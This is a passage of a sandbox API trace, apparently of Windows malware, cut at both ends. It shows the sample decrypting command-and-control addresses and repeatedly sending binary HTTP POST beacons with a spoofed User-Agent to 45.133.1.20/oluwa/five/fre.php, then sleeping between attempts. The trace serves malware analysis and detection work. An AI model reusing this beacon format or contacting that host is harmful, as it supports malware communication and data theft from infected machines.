GetProcessHeap () returned 0x6a0000 [0256.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0256.889] GetProcessHeap () returned 0x6a0000 [0256.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daec8 | out: hHeap=0x6a0000) returned 1 [0256.889] GetProcessHeap () returned 0x6a0000 [0256.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0256.890] closesocket (s=0x8a0) returned 0 [0256.891] GetProcessHeap () returned 0x6a0000 [0256.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0256.891] GetProcessHeap () returned 0x6a0000 [0256.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0256.892] GetProcessHeap () returned 0x6a0000 [0256.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0256.892] GetProcessHeap () returned 0x6a0000 [0256.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0256.893] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b9908, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15d0) returned 0x8a0 [0256.895] Sleep (dwMilliseconds=0xea60) [0256.896] GetProcessHeap () returned 0x6a0000 [0256.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0256.897] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.898] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0256.923] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.925] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0256.937] GetProcessHeap () returned 0x6a0000 [0256.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0256.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.938] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0256.939] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.939] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0256.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.940] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0256.940] GetProcessHeap () returned 0x6a0000 [0256.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0256.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.942] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0256.942] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.943] CryptDestroyKey (hKey=0x6ad020) returned 1 [0256.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.944] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0256.944] GetProcessHeap () returned 0x6a0000 [0256.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0256.944] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0256.953] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0256.956] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0256.957] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0256.958] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0256.958] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0256.959] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0256.959] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0256.959] GetProcessHeap () returned 0x6a0000 [0256.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0256.959] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0256.959] GetProcessHeap () returned 0x6a0000 [0256.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0256.960] GetProcessHeap () returned 0x6a0000 [0256.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0256.960] GetProcessHeap () returned 0x6a0000 [0256.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0256.961] GetProcessHeap () returned 0x6a0000 [0256.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0256.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.962] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0256.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.970] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0256.981] GetProcessHeap () returned 0x6a0000 [0256.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0256.981] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.982] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0256.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.984] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0256.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.985] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0256.985] GetProcessHeap () returned 0x6a0000 [0256.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0256.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.988] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0256.989] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.989] CryptDestroyKey (hKey=0x6ad020) returned 1 [0256.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.990] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0256.990] GetProcessHeap () returned 0x6a0000 [0256.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0256.991] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0256.991] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0256.992] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0256.993] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0256.993] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0256.994] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0256.994] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0256.995] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0256.995] GetProcessHeap () returned 0x6a0000 [0256.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0256.995] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0256.995] GetProcessHeap () returned 0x6a0000 [0256.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9b0 [0256.995] socket (af=2, type=1, protocol=6) returned 0x8a4 [0256.995] connect (s=0x8a4, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0257.021] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0257.021] GetProcessHeap () returned 0x6a0000 [0257.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0257.021] GetProcessHeap () returned 0x6a0000 [0257.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0257.022] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0257.023] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0257.023] GetProcessHeap () returned 0x6a0000 [0257.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6daec8 [0257.023] GetProcessHeap () returned 0x6a0000 [0257.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0257.023] GetProcessHeap () returned 0x6a0000 [0257.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0257.024] GetProcessHeap () returned 0x6a0000 [0257.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0257.024] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0257.025] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0257.025] GetProcessHeap () returned 0x6a0000 [0257.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0257.025] GetProcessHeap () returned 0x6a0000 [0257.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0257.025] send (s=0x8a4, buf=0x6bd460*, len=242, flags=0) returned 242 [0257.026] send (s=0x8a4, buf=0x6bb998*, len=159, flags=0) returned 159 [0257.026] GetProcessHeap () returned 0x6a0000 [0257.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b9908 [0257.026] recv (in: s=0x8a4, buf=0x6b9908, len=4048, flags=0 | out: buf=0x6b9908*) returned 204 [0257.113] GetProcessHeap () returned 0x6a0000 [0257.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0257.114] GetProcessHeap () returned 0x6a0000 [0257.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0257.115] GetProcessHeap () returned 0x6a0000 [0257.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daec8 | out: hHeap=0x6a0000) returned 1 [0257.115] GetProcessHeap () returned 0x6a0000 [0257.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0257.116] closesocket (s=0x8a4) returned 0 [0257.117] GetProcessHeap () returned 0x6a0000 [0257.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9b0 | out: hHeap=0x6a0000) returned 1 [0257.117] GetProcessHeap () returned 0x6a0000 [0257.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0257.117] GetProcessHeap () returned 0x6a0000 [0257.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0257.121] GetProcessHeap () returned 0x6a0000 [0257.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0257.122] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b9908, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15d4) returned 0x8a4 [0257.124] Sleep (dwMilliseconds=0xea60) [0257.125] GetProcessHeap () returned 0x6a0000 [0257.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0257.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.127] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0257.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.190] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0257.203] GetProcessHeap () returned 0x6a0000 [0257.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0257.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.208] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0257.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.209] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0257.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.210] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0257.210] GetProcessHeap () returned 0x6a0000 [0257.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0257.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.223] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0257.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.224] CryptDestroyKey (hKey=0x6ad020) returned 1 [0257.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.225] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0257.226] GetProcessHeap () returned 0x6a0000 [0257.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0257.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.227] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0257.228] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.228] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0257.229] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.230] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0257.230] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.231] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0257.231] GetProcessHeap () returned 0x6a0000 [0257.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0257.248] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0257.248] GetProcessHeap () returned 0x6a0000 [0257.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0257.249] GetProcessHeap () returned 0x6a0000 [0257.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0257.249] GetProcessHeap () returned 0x6a0000 [0257.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0257.250] GetProcessHeap () returned 0x6a0000 [0257.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0257.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.252] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0257.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.262] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0257.273] GetProcessHeap () returned 0x6a0000 [0257.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0257.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.274] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0257.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.275] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0257.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.276] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0257.276] GetProcessHeap () returned 0x6a0000 [0257.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0257.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.282] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0257.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.283] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0257.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0257.284] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0257.284] GetProcessHeap () returned 0x6a0000 [0257.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0257.285] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.286] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0257.287] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.287] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0257.288] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.288] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0257.292] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0257.292] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0257.292] GetProcessHeap () returned 0x6a0000 [0257.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0257.292] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0257.292] GetProcessHeap () returned 0x6a0000 [0257.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9b0 [0257.293] socket (af=2, type=1, protocol=6) returned 0x8a8 [0257.293] connect (s=0x8a8, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0257.317] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0257.317] GetProcessHeap () returned 0x6a0000 [0257.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0257.317] GetProcessHeap () returned 0x6a0000 [0257.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0257.318] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0257.319] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0257.319] GetProcessHeap () returned 0x6a0000 [0257.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6da808 [0257.319] GetProcessHeap () returned 0x6a0000 [0257.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0257.323] GetProcessHeap () returned 0x6a0000 [0257.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0257.323] GetProcessHeap () returned 0x6a0000 [0257.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0257.325] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0257.326] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0257.326] GetProcessHeap () returned 0x6a0000 [0257.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0257.326] GetProcessHeap () returned 0x6a0000 [0257.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0257.327] send (s=0x8a8, buf=0x6bd460*, len=242, flags=0) returned 242 [0257.327] send (s=0x8a8, buf=0x6bb998*, len=159, flags=0) returned 159 [0257.328] GetProcessHeap () returned 0x6a0000 [0257.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b9908 [0257.328] recv (in: s=0x8a8, buf=0x6b9908, len=4048, flags=0 | out: buf=0x6b9908*) returned 204 [0257.403] GetProcessHeap () returned 0x6a0000 [0257.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0257.403] GetProcessHeap () returned 0x6a0000 [0257.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0257.404] GetProcessHeap () returned 0x6a0000 [0257.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da808 | out: hHeap=0x6a0000) returned 1 [0257.404] GetProcessHeap () returned 0x6a0000 [0257.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0257.404] closesocket (s=0x8a8) returned 0 [0257.405] GetProcessHeap () returned 0x6a0000 [0257.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9b0 | out: hHeap=0x6a0000) returned 1 [0257.405] GetProcessHeap () returned 0x6a0000 [0257.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0257.406] GetProcessHeap () returned 0x6a0000 